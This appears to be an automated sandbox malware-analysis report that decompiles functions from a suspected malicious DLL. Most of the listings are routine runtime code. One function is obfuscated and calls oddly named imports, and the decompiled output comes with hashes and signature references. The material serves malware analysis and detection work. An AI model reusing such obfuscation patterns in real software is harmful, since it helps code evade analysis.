              • Part of subcall function 6D50B438: HeapAlloc.KERNEL32(00000000,00000001,00000004,?,6D5107B0,00000001,00000000,?,6D50E12F,00000001,00000004,00000000,00000001,?,?,6D50B13D), ref: 6D50B46A
            • __freea.LIBCMT ref: 6D5106F0
            • __freea.LIBCMT ref: 6D510715
            Memory Dump Source
            • Source File: 00000000.00000002.396475289.000000006D501000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D500000, based on PE: true
            • Associated: 00000000.00000002.396471857.000000006D500000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396487108.000000006D51B000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396507464.000000006D540000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396511100.000000006D541000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396523813.000000006D55C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396528397.000000006D55F000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_6d500000_loaddll32.jbxd
            Similarity
            • API ID: ByteCharMultiWide__freea$AllocHeap
            • String ID:
            • API String ID: 3147120248-0
            • Opcode ID: f43acc1688a6faeb2c7c526abb56c143bdea0ccb07cc61f1cdedbf56f64febdb
            • Instruction ID: 562003cd55f713cf21eebfd6a6bb7fc1f8e39c98c76786d4e0855021e6c5d8ef
            • Opcode Fuzzy Hash: f43acc1688a6faeb2c7c526abb56c143bdea0ccb07cc61f1cdedbf56f64febdb
            • Instruction Fuzzy Hash: 25510972608217AFFB198E69CC81FBF37A9EF85754F124A2AFD24D6540DB34DCA08650
            Uniqueness

            Uniqueness Score: -1.00%

            Function 6D509791 Relevance: 9.1, APIs: 6, Instructions: 60COMMON
            Download Yara Rule
            C-Code - Quality: 95%
            			E6D509791(void* __ecx, void* __edx) {
				void* _t4;
				void* _t11;
				void* _t16;
				long _t26;
				void* _t29;

				if( *0x6d55ce10 != 0xffffffff) {
					_t26 = GetLastError();
					_t11 = E6D509A8E(__eflags,  *0x6d55ce10);
					__eflags = _t11 - 0xffffffff;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						__eflags = _t11;
						if(__eflags == 0) {
							_t4 = E6D509AC8(__eflags,  *0x6d55ce10, 0xffffffff);
							_pop(_t16);
							__eflags = _t4;
							if(_t4 != 0) {
								_t29 = E6D50B523(_t16, 1, 0x28);
								__eflags = _t29;
								if(__eflags == 0) {
									L8:
									_t11 = 0;
									E6D509AC8(__eflags,  *0x6d55ce10, 0);
								} else {
									__eflags = E6D509AC8(__eflags,  *0x6d55ce10, _t29);
									if(__eflags != 0) {
										_t11 = _t29;
										_t29 = 0;
										__eflags = 0;
									} else {
										goto L8;
									}
								}
								E6D50B3FE(_t29);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t26);
					return _t11;
				} else {
					return 0;
				}
			}








            0x6d509798
            0x6d5097ab
            0x6d5097b2
            0x6d5097b5
            0x6d5097b8
            0x6d5097d1
            0x6d5097d1
            0x6d5097ba
            0x6d5097ba
            0x6d5097bc
            0x6d5097c6
            0x6d5097cc
            0x6d5097cd
            0x6d5097cf
            0x6d5097df
            0x6d5097e3
            0x6d5097e5
            0x6d5097f9
            0x6d5097f9
            0x6d509802
            0x6d5097e7
            0x6d5097f5
            0x6d5097f7
            0x6d50980b
            0x6d50980d
            0x6d50980d
            0x00000000
            0x00000000
            0x00000000
            0x6d5097f7
            0x6d509810
            0x00000000
            0x00000000
            0x00000000
            0x6d5097cf
            0x6d5097bc
            0x6d509818
            0x6d509822
            0x6d50979a
            0x6d50979c
            0x6d50979c

            APIs
            • GetLastError.KERNEL32(00000001,?,6D509584,6D5084B2,6D5080FB,?,6D50830B,?,00000001,?,?,00000001,?,6D53E618,0000000C,6D5083F4), ref: 6D50979F
            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6D5097AD
            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6D5097C6
            • SetLastError.KERNEL32(00000000,6D50830B,?,00000001,?,?,00000001,?,6D53E618,0000000C,6D5083F4,?,00000001,?), ref: 6D509818
            Memory Dump Source
            • Source File: 00000000.00000002.396475289.000000006D501000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D500000, based on PE: true
            • Associated: 00000000.00000002.396471857.000000006D500000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396487108.000000006D51B000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396507464.000000006D540000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396511100.000000006D541000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396523813.000000006D55C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396528397.000000006D55F000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_6d500000_loaddll32.jbxd
            Similarity
            • API ID: ErrorLastValue___vcrt_
            • String ID:
            • API String ID: 3852720340-0
            • Opcode ID: ac17046f214cdcdbe3c46d29528898203b19126ed5159c9e716d4f8d925631ad
            • Instruction ID: 945bb50c419f9a594c87d5009da16ff5aa78d712236e7cd96445faaea6ed250b
            • Opcode Fuzzy Hash: ac17046f214cdcdbe3c46d29528898203b19126ed5159c9e716d4f8d925631ad
            • Instruction Fuzzy Hash: FE01F53210D2136EAF1F16786C857772B79EB837B872E0629E23048DD8EF524C609A80
            Uniqueness

            Uniqueness Score: -1.00%

            Function 6D50A6AB Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
            Download Yara Rule
            APIs
            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,6D50A65C,?,?,6D50A5FC,?,6D53E678,0000000C,6D50A72F,00000000,00000000), ref: 6D50A6CB
            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6D50A6DE
            • FreeLibrary.KERNEL32(00000000,?,?,?,6D50A65C,?,?,6D50A5FC,?,6D53E678,0000000C,6D50A72F,00000000,00000000,00000001,6D508275), ref: 6D50A701
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.396475289.000000006D501000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D500000, based on PE: true
            • Associated: 00000000.00000002.396471857.000000006D500000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396487108.000000006D51B000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396507464.000000006D540000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396511100.000000006D541000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396523813.000000006D55C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396528397.000000006D55F000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_6d500000_loaddll32.jbxd
            Similarity
            • API ID: AddressFreeHandleLibraryModuleProc
            • String ID: CorExitProcess$mscoree.dll
            • API String ID: 4061214504-1276376045
            • Opcode ID: 7dc49902eb13282a37b9fb3a5ef3dcc694164543e200050a75a590d1e1ffc866
            • Instruction ID: 2107d41b333920de5aa8509b588315326755455225463b455f804226b95c24df
            • Opcode Fuzzy Hash: 7dc49902eb13282a37b9fb3a5ef3dcc694164543e200050a75a590d1e1ffc866
            • Instruction Fuzzy Hash: 1FF06271900219BBCF09AF90CC49FBD7FB5EF06352F024064F825A2A50DF719A80CB91
            Uniqueness

            Uniqueness Score: -1.00%

            Function 6D50768E Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 346COMMON
            Download Yara Rule
            C-Code - Quality: 46%
            			E6D50768E() {
				intOrPtr _t198;
				signed int _t205;
				intOrPtr _t206;
				signed int _t219;
				struct _CRITICAL_SECTION* _t226;
				signed int _t238;
				intOrPtr _t244;
				void* _t251;
				signed int _t276;
				signed int _t280;
				void* _t284;
				intOrPtr _t300;
				signed int _t301;
				signed int _t305;
				intOrPtr _t307;
				signed int _t317;
				signed int _t318;
				signed int _t322;
				signed int _t329;
				void* _t331;
				intOrPtr _t332;
				intOrPtr _t334;
				intOrPtr _t335;
				signed int _t336;
				signed int _t341;
				void* _t350;
				signed int _t351;
				intOrPtr _t353;
				void* _t355;
				intOrPtr _t357;
				signed int* _t358;
				intOrPtr _t363;
				signed int _t365;
				void* _t371;
				void* _t372;
				void* _t373;

				_t307 =  *((intOrPtr*)(_t371 + 0x54));
				_t357 =  *((intOrPtr*)(_t371 + 0x68));
				 *((intOrPtr*)(_t371 + 0xc)) = _t307 + 0x41e;
				_t363 =  *((intOrPtr*)(_t371 + 0x54)) + 0xfffffd78;
				_t353 =  *((intOrPtr*)(_t371 + 0x78));
				 *((intOrPtr*)(_t371 + 0x14)) = _t307 + 0x140;
				_t300 = _t357 + 0x6f9;
				 *((intOrPtr*)(_t371 + 0x5c)) = _t363;
				 *((intOrPtr*)(_t371 + 0x18)) = _t307 - 0x2872;
				_push(_t357);
				 *((intOrPtr*)(_t371 + 0x80)) =  *((intOrPtr*)(_t371 + 0x80)) + 0x956;
				 *((intOrPtr*)(_t371 + 0x20)) = _t353 + 0xb56;
				_t332 = _t353 - 0x1e7b;
				 *((intOrPtr*)(_t371 + 0x7c)) = _t332;
				 *((intOrPtr*)(_t371 + 0x28)) = _t307 - 0x2db;
				 *((intOrPtr*)(_t371 + 0x70)) = _t357 - 0x69;
				_push(_t307 + 0x32);
				_push(_t363 + 0xfffffe4e);
				 *((intOrPtr*)(_t371 + 0x2c)) = _t300;
				_push(_t300 - 0x762);
				_push( *((intOrPtr*)(_t371 + 0x78)));
				_push(_t307 - 0x984);
				_push(_t307 - 0x984);
				_push(_t300 - 0xe15);
				_push( *((intOrPtr*)(_t371 + 0x80)) + 0xfffffea1);
				_push(_t300 - 0x547);
				_push(_t357 + 0x52c);
				_push(_t307);
				_push(_t357 - 0xea);
				_push(_t332 + 0x28a4);
				_t365 = E6D515588();
				_t198 =  *((intOrPtr*)(_t371 + 0x98));
				_t334 =  *((intOrPtr*)(_t371 + 0x50)) + 0x1e7b;
				 *((intOrPtr*)(_t371 + 0x8c)) = _t334;
				_push(_t198 - 0x3c4);
				_push(_t300 - 0xda2);
				_push(_t334);
				_push( *((intOrPtr*)(_t371 + 0xbc)) + 0x269);
				_push(_t357);
				_push(_t198 + 0xe2);
				_t41 = _t365 - 0x1b2; // -434
				_push( *((intOrPtr*)(_t371 + 0xb0)) + 0x42f);
				_t358 =  *(_t371 + 0xc0);
				_push(_t357 + 0x43a);
				_push(_t300 - 0x1dd);
				_push(_t358);
				_t205 = E6D51450E();
				_t335 =  *((intOrPtr*)(_t371 + 0x78));
				_t301 = _t205;
				_t206 =  *((intOrPtr*)(_t371 + 0xd0));
				_t372 = _t371 + 0x64;
				_push(_t206 + 0x977);
				_push(_t206 + 0x344);
				_push(_t335 - 0x7c9);
				_t52 = _t301 + 0x71c; // 0x71c
				_push(_t358);
				_push( *((intOrPtr*)(_t372 + 0x64)) + 0x1a7);
				_push( *((intOrPtr*)(_t372 + 0x7c)));
				_push(_t353 - 0x88);
				_push(_t335 + 0x111);
				_push(_t353 + 0x632);
				_push( *((intOrPtr*)(_t372 + 0x38)) + 0xfffff89e);
				_t58 = _t365 - 0x21b; // -539
				_push( *((intOrPtr*)(_t372 + 0x8c)) + 0x75c);
				_t60 = _t365 - 0x560; // -1376
				_t61 = _t365 + 0x129; // 0x129
				_t219 = E6D513E64();
				_t373 = _t372 + 0x3c;
				 *(_t373 + 0x28) = _t219;
				if(_t301 == _t353) {
					_t336 =  *(_t373 + 0x24);
					if(_t301 < _t336 + 0x90e) {
						_t65 = _t301 + 0xcfd; // 0xcfd
						_t355 = _t65;
						if( *(_t373 + 0x14) == _t355) {
							_t317 = _t358[0x52];
							 *(_t373 + 0x64) = _t317;
							_t358[0xa] = (_t358[0x2f] & _t336 & _t301) * _t358[0xa];
							_t226 =  *(_t373 + 0x7c) | 0x00002ac3;
							 *(_t373 + 0x50) = _t226;
							if(_t317 > _t226) {
								_t318 =  *(_t373 + 0x20);
								 *(_t373 + 0x28) = _t301 ^  *(_t373 + 0x1c);
								 *(_t373 + 0x24) = _t336 ^ 0x00001df3;
								 *(_t373 + 0x14) = _t301 * 0x00001e7b ^ 0x00002597;
								_t106 = _t365 - 0x2ea5; // -11941
								 *(_t373 + 0x30) = _t106 * _t318;
								 *(_t373 + 0x34) = _t318 | _t336 |  *(_t373 + 0x1c);
								_t238 =  *(_t373 + 0x78);
								 *(_t373 + 0x38) = _t238 & _t301;
								 *(_t373 + 0x3c) = _t365 * 0x29b2;
								 *((intOrPtr*)(_t373 + 0x40)) = _t238 + _t365;
								_t341 =  *_t358;
								 *((intOrPtr*)(_t373 + 0x48)) = (_t238 & _t318) + 0x252e;
								 *(_t373 + 0x44) = _t365 ^ _t318 | 0x00002ac3;
								 *(_t373 + 0x4c) =  *(_t373 + 0x18) |  *(_t373 + 0x10) | 0x00002749;
								do {
									_t244 =  *((intOrPtr*)(_t373 + 0x68));
									 *(_t373 + 0x2c) = _t341 &  *(_t373 + 0x28);
									_push( *(_t244 + 0xe4) *  *(_t244 + 0xe4) - 0x1e7b);
									_push( *(_t244 + 0x124) ^  *(_t244 + 8) | 0x00001eee);
									_push(( *(_t244 + 0x1a8) |  *(_t244 + 8)) +  *((intOrPtr*)(_t373 + 0x5c)));
									_push( *(_t373 + 0x64) * 0x1df3 -  *(_t373 + 0x1c));
									_push( *(_t373 + 0x78));
									_push(_t358[0x22] - 0x000021e9 ^ 0x00002c90);
									_push( *(_t373 + 0x3c));
									_push(_t358[0x46] * 0x2b78);
									_t251 = E6D5143A4(_t358[0x75] + _t318 & 0x00001eee,  *((intOrPtr*)(_t373 + 0x40)),  *(_t373 + 0x38), _t358[0x3a] & _t358[0x1a] & 0x00001df3);
									_t358 =  *(_t373 + 0x98);
									_t305 =  *(_t373 + 0xa8);
									_t322 = _t358[2];
									_push(_t322 |  *(_t373 + 0xac));
									_push( *(_t373 + 0x64));
									_push(_t358[0x3e] + _t305);
									_push( *((intOrPtr*)(_t373 + 0x70)));
									_push(_t358[0x4f] *  *(_t373 + 0xac) ^ _t358[0x17]);
									_push( *(_t373 + 0x7c));
									_push(_t305 - _t358[0x34]);
									_push( *((intOrPtr*)(_t373 + 0x88)));
									_push(_t358[0x24] & _t358[0x49]);
									_push( *((intOrPtr*)(_t373 + 0x6c)) - _t358[0x75]);
									_push( *(_t373 + 0x98));
									_push(_t358[0x1d] - _t305 | _t358[0xa]);
									_push(_t358);
									_push( *(_t373 + 0xa8));
									_push(_t322 -  *((intOrPtr*)(_t373 + 0x94)));
									_push( *(_t373 + 0xac) - _t251 - 0x21e9);
									E6D51A07D();
									_t373 = _t373 + 0x70;
									_push( *((intOrPtr*)(_t373 + 0x48)));
									LeaveCriticalSection( *(_t373 + 0x50));
									_t341 =  *_t358;
									_t358[0xf] = _t358[0xf] | (_t341 ^ 0x00001df3) +  *(_t373 + 0x18);
									if( *(_t373 + 0x10) <= ((_t358[0x4f] ^ _t305) & _t358[4])) {
										 *(_t373 + 0x60) =  *(_t373 + 0x60) | _t358[0x1d] |  *(_t373 + 0x1c);
									}
									_t318 =  *(_t373 + 0x20);
									_t276 =  *(_t373 + 0x64) + 2;
									 *(_t373 + 0x64) = _t276;
								} while (_t276 >  *(_t373 + 0x50));
							}
						} else {
							_t358[0x23] = _t358[0x7c];
							_t358[0x2f] = _t358[0x2f] - (_t358[0x4c] ^ 0x000024ad);
							_t280 = _t358[2];
							_t350 =  *((intOrPtr*)(_t280 + 0x4c)) - 0x424;
							while(_t350 <  *((intOrPtr*)(_t280 + 0x1c)) - 0x424) {
								_t350 = _t350 + 1;
								 *((intOrPtr*)(_t358[0x14] + 0xbc)) = _t358[0x24] - 0x252e;
								_t280 = _t358[2];
							}
							_t351 =  *(_t373 + 0x28);
							_t284 = 0xffffff98;
							 *((intOrPtr*)(_t358[0x1d] + 0x28)) =  *((intOrPtr*)(_t358[0x1d] + 0x28)) + _t284 - _t358;
							_t329 =  *(_t373 + 0x64);
							_push(_t355);
							_push(_t351 - 0x4b6);
							_push( *(_t373 + 0x1c) + 0xfffffc5b);
							_t86 = _t365 + 0x37a; // 0x37a
							_push(_t329);
							_push(_t329 - 0x9f7);
							_push(_t329);
							_t89 = _t365 + 0x129; // 0x129
							_t331 =  *(_t373 + 0x78) + 0xfffffe4e;
							_push( &(( *(_t373 + 0x98))[0xa74]));
							_push(_t351 - 0x52c);
							_push(_t331);
							_push( *((intOrPtr*)(_t373 + 0xa4)) + 0x36a);
							_push(_t331);
							_push(_t358);
							_push( *((intOrPtr*)(_t373 + 0x90)) + 0xfffffb5d);
							E6D5029E2();
							_t373 = _t373 + 0x3c;
						}
					}
				}
				return  *((intOrPtr*)(_t373 + 0x54));
			}







































            0x6d507691
            0x6d50769c
            0x6d5076a6
            0x6d5076aa
            0x6d5076b1
            0x6d5076bb
            0x6d5076bf
            0x6d5076cb
            0x6d5076cf
            0x6d5076d9
            0x6d5076e0
            0x6d5076eb
            0x6d5076ef
            0x6d5076fb
            0x6d5076ff
            0x6d507706
            0x6d50770d
            0x6d50770e
            0x6d507715
            0x6d507719
            0x6d50771a
            0x6d507724
            0x6d50772b
            0x6d507732
            0x6d50773f
            0x6d507746
            0x6d50774d
            0x6d50774e
            0x6d507755
            0x6d50775c
            0x6d507766
            0x6d507768
            0x6d50776f
            0x6d507775
            0x6d507787
            0x6d50778e
            0x6d507796
            0x6d50779d
            0x6d50779e
            0x6d50779f
            0x6d5077a0
            0x6d5077b3
            0x6d5077ba
            0x6d5077c1
            0x6d5077c8
            0x6d5077c9
            0x6d5077ca
            0x6d5077cf
            0x6d5077d3
            0x6d5077d5
            0x6d5077dc
            0x6d5077e5
            0x6d5077f0
            0x6d5077fc
            0x6d5077fd
            0x6d507804
            0x6d507805
            0x6d507806
            0x6d507810
            0x6d507817
            0x6d50781e
            0x6d507828
            0x6d507829
            0x6d50783c
            0x6d50783d
            0x6d507844
            0x6d50784b
            0x6d507850
            0x6d507853
            0x6d507859
            0x6d50785f
            0x6d50786b
            0x6d507871
            0x6d507871
            0x6d50787b
            0x6d507959
            0x6d507963
            0x6d50796b
            0x6d507972
            0x6d507977
            0x6d50797d
            0x6d507983
            0x6d50798d
            0x6d507998
            0x6d5079a7
            0x6d5079ab
            0x6d5079b4
            0x6d5079c0
            0x6d5079c4
            0x6d5079cc
            0x6d5079d6
            0x6d5079df
            0x6d5079e3
            0x6d5079ea
            0x6d507a03
            0x6d507a07
            0x6d507a0b
            0x6d507a0b
            0x6d507a4f
            0x6d507a7a
            0x6d507a83
            0x6d507a84
            0x6d507a89
            0x6d507a8a
            0x6d507a92
            0x6d507a93
            0x6d507a97
            0x6d507a9f
            0x6d507aa4
            0x6d507ab2
            0x6d507ac1
            0x6d507acd
            0x6d507ace
            0x6d507ae1
            0x6d507ae2
            0x6d507af7
            0x6d507af8
            0x6d507b04
            0x6d507b05
            0x6d507b18
            0x6d507b23
            0x6d507b24
            0x6d507b33
            0x6d507b34
            0x6d507b35
            0x6d507b3c
            0x6d507b3d
            0x6d507b3e
            0x6d507b43
            0x6d507b46
            0x6d507b4e
            0x6d507b54
            0x6d507b61
            0x6d507b73
            0x6d507b7c
            0x6d507b7c
            0x6d507b84
            0x6d507b88
            0x6d507b8b
            0x6d507b8f
            0x6d507a0b
            0x6d507881
            0x6d50788c
            0x6d50789d
            0x6d5078a3
            0x6d5078a9
            0x6d5078c6
            0x6d5078bc
            0x6d5078bd
            0x6d5078c3
            0x6d5078c3
            0x6d5078d2
            0x6d5078d8
            0x6d5078db
            0x6d5078e4
            0x6d5078e8
            0x6d5078e9
            0x6d5078f3
            0x6d5078f4
            0x6d5078fb
            0x6d507902
            0x6d507903
            0x6d507908
            0x6d507916
            0x6d507921
            0x6d507928
            0x6d507930
            0x6d507936
            0x6d50793e
            0x6d507944
            0x6d507945
            0x6d507946
            0x6d50794b
            0x6d50794b
            0x6d50787b
            0x6d50786b
            0x6d507ba4

            APIs
            • SNifCw242OCD._RSR(?,?,?,?,?,-FFFFF54B,?,?,?,?,?,?,?), ref: 6D50775D
            • Mqae01id._RSR(?,?,?,?,-000001B2,?,?,?,?,?,?,?,?,?,?,?), ref: 6D5077CA
            • LeaveCriticalSection.KERNEL32(?,?), ref: 6D507B4E
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.396475289.000000006D501000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D500000, based on PE: true
            • Associated: 00000000.00000002.396471857.000000006D500000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396487108.000000006D51B000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396507464.000000006D540000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396511100.000000006D541000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396523813.000000006D55C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396528397.000000006D55F000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_6d500000_loaddll32.jbxd
            Similarity
            • API ID: CriticalCw242LeaveMqae01idSection
            • String ID: V
            • API String ID: 1039995855-3571732617
            • Opcode ID: 03a1104c5bd03d2d4055a77696c54d7c90657510467734026d2d4be7f235ba05
            • Instruction ID: 4500fdd40326e61316916a76484da3a45bc343e0338b3917c43096f6e4ba33a9
            • Opcode Fuzzy Hash: 03a1104c5bd03d2d4055a77696c54d7c90657510467734026d2d4be7f235ba05
            • Instruction Fuzzy Hash: 23E105B26087459FD725CF68C884E9BB7E9FB88304F048A6EE59AC7250D734E944CF52
            Uniqueness

            Uniqueness Score: -1.00%

            Function 6D5103C3 Relevance: 6.1, APIs: 4, Instructions: 110COMMON
            Download Yara Rule
            C-Code - Quality: 81%
            			E6D5103C3(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
				signed int _v8;
				int _v12;
				char _v16;
				intOrPtr _v24;
				char _v28;
				void* _v40;
				signed int _t34;
				signed int _t40;
				int _t46;
				int _t53;
				void* _t55;
				int _t57;
				signed int _t63;
				int _t67;
				short* _t69;
				signed int _t70;
				short* _t71;

				_t34 =  *0x6d55ce08; // 0xc2f81198
				_v8 = _t34 ^ _t70;
				E6D50B580(__ebx,  &_v28, __edx, _a4);
				_t57 = _a24;
				if(_t57 == 0) {
					_t53 =  *(_v24 + 8);
					_t57 = _t53;
					_a24 = _t53;
				}
				_t67 = 0;
				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
				_v12 = _t40;
				if(_t40 == 0) {
					L15:
					if(_v16 != 0) {
						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
					}
					return E6D508B95(_v8 ^ _t70);
				}
				_t55 = _t40 + _t40;
				_t17 = _t55 + 8; // 0x8
				asm("sbb eax, eax");
				if((_t17 & _t40) == 0) {
					_t69 = 0;
					L11:
					if(_t69 != 0) {
						E6D509250(_t67, _t69, _t67, _t55);
						_t46 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t69, _v12);
						if(_t46 != 0) {
							_t67 = GetStringTypeW(_a8, _t69, _t46, _a20);
						}
					}
					L14:
					E6D5104E0(_t69);
					goto L15;
				}
				_t20 = _t55 + 8; // 0x8
				asm("sbb eax, eax");
				_t48 = _t40 & _t20;
				_t21 = _t55 + 8; // 0x8
				_t63 = _t21;
				if((_t40 & _t20) > 0x400) {
					asm("sbb eax, eax");
					_t69 = E6D50B438(_t63, _t48 & _t63);
					if(_t69 == 0) {
						goto L14;
					}
					 *_t69 = 0xdddd;
					L9:
					_t69 =  &(_t69[4]);
					goto L11;
				}
				asm("sbb eax, eax");
				E6D513490();
				_t69 = _t71;
				if(_t69 == 0) {
					goto L14;
				}
				 *_t69 = 0xcccc;
				goto L9;
			}




















            0x6d5103cb
            0x6d5103d2
            0x6d5103de
            0x6d5103e3
            0x6d5103e8
            0x6d5103ed
            0x6d5103f0
            0x6d5103f2
            0x6d5103f2
            0x6d5103f7
            0x6d510410
            0x6d510416
            0x6d51041b
            0x6d5104ba
            0x6d5104be
            0x6d5104c3
            0x6d5104c3
            0x6d5104df
            0x6d5104df
            0x6d510421
            0x6d510424
            0x6d510429
            0x6d51042d
            0x6d510479
            0x6d51047b
            0x6d51047d
            0x6d510482
            0x6d510499
            0x6d5104a1
            0x6d5104b1
            0x6d5104b1
            0x6d5104a1
            0x6d5104b3
            0x6d5104b4
            0x00000000
            0x6d5104b9
            0x6d51042f
            0x6d510434
            0x6d510436
            0x6d510438
            0x6d510438
            0x6d510440
            0x6d51045d
            0x6d510467
            0x6d51046c
            0x00000000
            0x00000000
            0x6d51046e
            0x6d510474
            0x6d510474
            0x00000000
            0x6d510474
            0x6d510444
            0x6d510448
            0x6d51044d
            0x6d510451
            0x00000000
            0x00000000
            0x6d510453
            0x00000000

            APIs
            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,6D50DAF1,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 6D510410
            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 6D510499
            • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 6D5104AB
            • __freea.LIBCMT ref: 6D5104B4
              • Part of subcall function 6D50B438: HeapAlloc.KERNEL32(00000000,00000001,00000004,?,6D5107B0,00000001,00000000,?,6D50E12F,00000001,00000004,00000000,00000001,?,?,6D50B13D), ref: 6D50B46A
            Memory Dump Source
            • Source File: 00000000.00000002.396475289.000000006D501000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D500000, based on PE: true
            • Associated: 00000000.00000002.396471857.000000006D500000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396487108.000000006D51B000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396507464.000000006D540000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396511100.000000006D541000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396523813.000000006D55C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396528397.000000006D55F000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_6d500000_loaddll32.jbxd
            Similarity
            • API ID: ByteCharMultiWide$AllocHeapStringType__freea
            • String ID:
            • API String ID: 573072132-0
            • Opcode ID: 86144a8a7f9a1a338337e632a2b87417814e03e44f2811e709a257b601f73315
            • Instruction ID: ef0240e1946353bac50c743b73a3b02e0c797ecb1fa255f66c55e96db10a9baa
            • Opcode Fuzzy Hash: 86144a8a7f9a1a338337e632a2b87417814e03e44f2811e709a257b601f73315
            • Instruction Fuzzy Hash: 3731D072A0421AABEF199F6ACCC0EBE3BB5EB41310F054529EC14D6650E779CD64CB90
            Uniqueness

            Uniqueness Score: -1.00%

            Function 6D50DCAB Relevance: 6.1, APIs: 4, Instructions: 68COMMON
            Download Yara Rule
            C-Code - Quality: 93%
            			E6D50DCAB() {
				int _v8;
				void* __ecx;
				void* _t6;
				int _t7;
				char* _t13;
				int _t17;
				void* _t19;
				char* _t25;
				WCHAR* _t27;

				_t27 = GetEnvironmentStringsW();
				if(_t27 == 0) {
					L7:
					_t13 = 0;
				} else {
					_t6 = E6D50DC74(_t27);
					_pop(_t19);
					_t17 = _t6 - _t27 >> 1;
					_t7 = WideCharToMultiByte(0, 0, _t27, _t17, 0, 0, 0, 0);
					_v8 = _t7;
					if(_t7 == 0) {
						goto L7;
					} else {
						_t25 = E6D50B438(_t19, _t7);
						if(_t25 == 0 || WideCharToMultiByte(0, 0, _t27, _t17, _t25, _v8, 0, 0) == 0) {
							_t13 = 0;
						} else {
							_t13 = _t25;
							_t25 = 0;
						}
						E6D50B3FE(_t25);
					}
				}
				if(_t27 != 0) {
					FreeEnvironmentStringsW(_t27);
				}
				return _t13;
			}












            0x6d50dcba
            0x6d50dcc0
            0x6d50dd18
            0x6d50dd18
            0x6d50dcc2
            0x6d50dcc3
            0x6d50dcc8
            0x6d50dcd1
            0x6d50dcd7
            0x6d50dcdd
            0x6d50dce2
            0x00000000
            0x6d50dce4
            0x6d50dcea
            0x6d50dcef
            0x6d50dd0d
            0x6d50dd07
            0x6d50dd07
            0x6d50dd09
            0x6d50dd09
            0x6d50dd10
            0x6d50dd15
            0x6d50dce2
            0x6d50dd1c
            0x6d50dd1f
            0x6d50dd1f
            0x6d50dd2d

            APIs
            • GetEnvironmentStringsW.KERNEL32 ref: 6D50DCB4
            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6D50DCD7
              • Part of subcall function 6D50B438: HeapAlloc.KERNEL32(00000000,00000001,00000004,?,6D5107B0,00000001,00000000,?,6D50E12F,00000001,00000004,00000000,00000001,?,?,6D50B13D), ref: 6D50B46A
            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 6D50DCFD
            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6D50DD1F
